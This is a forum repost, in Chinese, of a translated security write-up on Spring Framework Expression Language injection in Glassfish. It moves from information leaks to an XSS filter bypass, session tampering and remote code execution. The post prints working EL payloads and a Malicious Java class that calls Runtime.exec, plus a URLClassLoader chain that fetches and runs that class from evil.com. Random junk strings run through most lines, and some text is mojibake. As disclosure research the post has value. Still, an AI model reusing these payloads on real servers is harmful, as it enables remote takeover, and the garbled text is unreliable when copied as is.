Remote Code with
+ Q: e+ v1 J/ Y- Q* DExpression Language Injection( k9 u( J5 n" `1 T4 F5 G6 C
Spring Framework脆弱性—DanAmodio( r, o2 ]4 I" d. _6 a& _" a1 c
全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中8 f8 a! P4 U' Q4 l
可能会存在风险。
! {4 M. g# G% I& o在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的2 w# Y5 C; v3 m: Q- C
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可+ e, H m! I. L0 ^& n* F
以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,) m# B3 ^+ x! z; e" `6 o# j& F* E
以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前- o) _) V+ |3 g5 ?6 m1 Z
版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。
( t1 `/ I& w. B m0 w由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但
5 r& K. l& M: k/ q我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版
, v- _9 `! v7 Z y4 x本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。
; D- F( o, X( }9 w这些版本不支持禁用double EL resolution.! F ^8 N8 F0 E4 u7 e
这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含
" r1 L1 w/ }' t2 Q3 N8 {EL2.2容器上可能进行远程代码执行。
( I7 D4 L8 o* @, k这是一个原始信息泄露的攻击例子:% z1 M* ?6 a" ~5 u
请求:* ?7 c: c# C: @1 V+ n
ttp://vulnerable.com/foo?message=${applicationScope}# N( E$ E5 ^+ U5 Y. ]2 h5 }
到达以下内容页面:
. [) x) I9 |4 @! V8 L l结果将输出一些包含内部服务器信息calsspath 和本地工作目录
1 s9 f1 g5 X: |6 E8 G5 h你也可以做一些其他事情,如这样:! F$ T) e. Y) I$ ]
${9999+1}
3 d& L+ Q: l' a: V+ j$ N U1 V还可以访问session 对象和beans R) G# `8 L2 v" Z ~! ^
${employee.lastName}; n ~$ P% `& @1 O' n+ y) w: {
在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是
6 ]( i0 X. y h) `EL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东$ C3 k( g, _$ G3 x7 F, j5 f; h
西,比如XSS.9 Q* \/ `. W& i. y, c
哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签
) L1 [* |8 B- f* V% d突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤
; _; Q" h$ C2 Q3 Q. z呢?”1 c$ [" |/ N+ O3 `3 K
因此,我尝试巳缦拢�
. N: I( H6 q Mhttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP u- \( r5 l2 `! Y; H
P
* A6 F6 ~6 c& m+ R% v d* I) }& v' M我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返3 X/ s) S" b' G; h- @6 |* H
回的文本被插入进了spring:message 标签。! u# F; t- h9 G
这里是一个最终绕过过滤的实例:
6 d" J( g* ?) i# fhttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ
! u; I$ y1 z, Y6 _9 W4 m6 E它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为
7 z: _0 J9 X$ |: q6 P什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?
. V/ [& g4 E! Y! H* k& X7 H/ o. D% U经过一番研究,我学习到EL2.2 增加了方法调用。
2 A: M) r( Q8 n v9 ]我写了一个快速测试应用程序代码并且检测一些功能3 h( \* }& x3 z ]. }: C. Z5 S
${pageContext.request.getSession().setAttribute(“account”,”123456″)}3 l5 n5 C8 D6 ~7 Z3 M+ b6 Z3 ?3 w
${pageContext.request.getSession().setAttribute(“admin”,true)}; g* }5 j, E& d9 U
好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的
8 o: O, Z- C- g/ K2 z( x& E% |指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?
. E5 j+ B( \ T5 O1 }: U${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1! V. V) `" O9 {! x% A/ s! P3 E$ u
“, 1234)}: P8 M9 Z+ t0 }
${“”.getClass().forName(“java.lang.Runtime”)}+ e5 p& ~. k& o/ @9 P( h$ h: i7 }
哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不) _9 _! f1 ~* `, f( `3 o0 E
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函
7 k$ Z. F8 ]( R6 x4 V: f数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有
" t6 @. c9 f- o# J% K一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于
6 m' ~- m! @, e- [/ `$ E z+ c方法签名invoke(Object obj, Object„ args)
* }, s& p+ \1 X# bJeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问
* c! t( {1 a( F; c, A* J题,以让它可以工作起来。, |9 S4 p5 J( e" I* c$ Y: Z# z& ?
漏洞利用:
Z1 ^/ K! @3 @# S, a( g我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我' u6 d0 n$ a3 Q# H- q$ z
希望你们中的一些JAVA奇才告诉我我是如此的可笑。" ^1 S6 ]1 w) m
这里有一些我试过的失败的用例,为了试图让它工作的用例:
# b" K- L/ C* j. p- Q# w 写文件到文件系统
- Z. ]8 |8 C! y. n 试图载入org.springframework.expression.spel.standard.SpelExpressionParser.
8 ]9 G; G- N8 M) N2 J我认为这些可以很好的工作,但是我不能找到合适的类来载入。
/ L. a. y4 L1 n3 M+ E1 @! o${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}8 l: k* c1 j$ L3 r1 R: e8 A
javax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:
$ |3 k8 X" x, [, Worg.springframework.expression.spel.standard.SpelExpressionParser not found8 f- o* Z( \8 {' w- l
by" m7 @0 T S7 j
org.glassfish.web.javax.servlet.jsp [194].- R" q6 |2 Z/ s7 y2 o1 k0 C
利用反射来修改java.lang.Runtime.currentRuntime的属性为Public
+ `6 [: Y5 \/ w/ y$ J5 A2 J0 ^5 c( r 利用反射来创建一个新的Runtime(and watch the world burn)
7 S! M5 ~ _" z6 M) _: w${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName
9 B% U, ]- _' F K: }(“java.lang.Runtime”)).getDeclaredConstructors()[0])}8 ?2 H6 e3 O6 o/ m- s! j
${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}, V1 P# F# ?4 w) n
使用java.lang.ProcessBuilder9 P1 y( O! \& @3 H# f
用表达式语言来评估表达式语言; W$ |- X# @/ L/ v0 t% V$ h7 ?
Expression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.
8 v9 z: q8 Z, I# F${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request( Y- Z6 f- a, S* f8 s4 d* K( v
“,”".getClass(),null)}
2 l/ s! n; g0 l9 N1 P 创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)
1 ^9 w; _! o0 U# a+ I* {我在使用一个空数组通过Method.invoke()时失败了很多次
' w' {6 l _9 {# A: R! m“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo2 f" L+ b d5 Z# y' t$ I
.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A
0 Z& T/ N2 y, ^, {rrayList”).newInstance().toArray())
/ B2 ~' A$ p0 `. cjava.lang.IllegalArgumentException: wrong number of arguments
2 i( W+ R) K1 j: [最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可+ w( S* p# M+ D$ v- {% Y. J* f
以创建一个恶意class文件并且指向类装载器.* t+ _7 k* m( F ]% R. N# ~
我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:
' Y' w- w0 ?* Y( Q7 s8 `8 @# L4 @public class Malicious {: e T& T$ K2 r
public Malicious() {$ P" E/ ?+ o4 g7 x5 P. S; h& l
try {
8 U2 Z5 g2 y* q; Hjava.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac
6 N @) f! }9 q; [/ _; x- Rjava.lang.Runtime.getRuntime().exec(“calc.exe”); //Win
0 W+ e: F N) f) i} catch (Exception e) {( C8 M. |) |' ?+ j% o
}/ H* [# Z! j/ M* W& q
}9 a9 c% h5 e3 N' P2 o0 @
我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回
: C( s: @- y3 ]话中,因此它可以被使用.! L; l# i( s+ w3 Z8 {( P* ?* v# X7 ?
${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName8 ~. C' i* m( x3 n. f
(“java.util.ArrayList”).newInstance())}. }7 J, r- F) k8 X. {/ k% `
URLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建+ |1 g1 ~4 [& v4 M5 h
一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和
7 c4 {) I" M3 CgetResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个9 m5 b' b8 N8 D7 a ?( p4 r
我们可以调用的create(string)方法,然后转换对一个URL对象。
9 C# t" M0 b1 w i: h! y5 P/ @${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh" N/ f' p, t ~+ L8 [/ }: k+ Y8 T
ere/malicious/classfile/is/located/”).toURL())}
3 {/ Q7 p/ ~4 y9 P2 l2 Y }然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,, q4 f: C2 k/ p' c5 i! g& F& i8 Z" j
恶意类文件被装载并创建,触发远程代码.
" n+ ?$ f6 E; v6 U. Y; i3 c${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte0 j' d- @0 U. h( g/ O! }
xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().& W6 |4 c8 @7 y8 G. Q' X
getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance6 }' J7 a+ I0 j3 ~9 Q' v
()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对